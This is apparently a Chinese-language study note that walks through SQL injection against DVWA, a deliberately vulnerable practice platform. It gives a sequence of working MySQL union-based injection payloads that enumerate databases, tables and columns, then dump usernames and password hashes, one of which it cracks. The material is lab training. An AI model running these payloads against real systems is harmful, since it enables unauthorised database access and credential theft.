DVWA平臺測試之SQL注入low

網絡安全學習筆記,僅限學習交流
不得利用、從事危害國家或人民安全、榮譽和利益等活動

測試環境與工具:
測試平臺:DVWA,下載地址:http://down.51cto.com/data/875088,也可下載metaspolit-table2虛擬機,裏面已經部署好了dvwa.。
滲透工具:burpsuite-1.4.07下載地址:http://down.51cto.com/data/875103
首先我們介紹下DVWA和Burpsuite,DVWA這是一個php+mysql平臺構建的預置web常見漏洞的滲透練習平臺。能夠幫助web應用安全研究人員很好了解web漏洞。Burpsuite是一款功能強大的web滲透測試工具。

SQL注入漏洞在OWASP TOP 10威脅中,一直排名第一,安全威脅可見一斑。SQL注入滲透測試過程中,針對不同的數據庫平臺,注入語句選擇也不同,本篇筆者主要測試mysql注入的常用語句以及滲透思路。

登錄訪問DVWA,默認用戶名:admin密碼:password.

1.選擇難度級別 Low
在這裏插入圖片描述
2. 輸入1.正常顯示。 1’ 報錯,根據報錯內容判斷爲’閉合
在這裏插入圖片描述在這裏插入圖片描述

Order by 判斷 表的列數

在這裏插入圖片描述

3.union 聯合查詢語句 爆出數據庫
1’ union select 1,database() #
數據庫名爲:dvwa
在這裏插入圖片描述
union 聯合查詢,連接2個語句,
但先執行第1個,
如果顯示位只有1處,那麼第2個語句結果無法顯示
所以,輸入id=-1 語句正確,但無法顯示
那麼,顯示位即顯示第2個語句結果

在這裏插入圖片描述
數據庫版本號:
5.0以上版本,有information_schema.tables。包含所有的數據庫信息
1’ union select 1,version() #
在這裏插入圖片描述

測試連接數據庫權限:
1’ and ord(mid(user(),1,1))=114 #
返回正常說明爲root
在這裏插入圖片描述

  1. 爆出數據庫中的表名
    1’ union select 1,table_name from information_schema.tables where table_schema=‘dvwa’#
    在這裏插入圖片描述
    5.爆出users字段名
    1’ union select 1,column_name from information_schema.columns where
    table_name=‘users’ 在這裏插入圖片描述
    6.爆出用戶名和密碼,對應user和password
    1’ union select user,password from users #
    在這裏插入圖片描述
    密碼進行了加密處理,需md5解密
    用戶名:admin
    密碼:5f4dcc3b5aa765d61d8327deb882cf99
    解密爲:password
    在這裏插入圖片描述
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章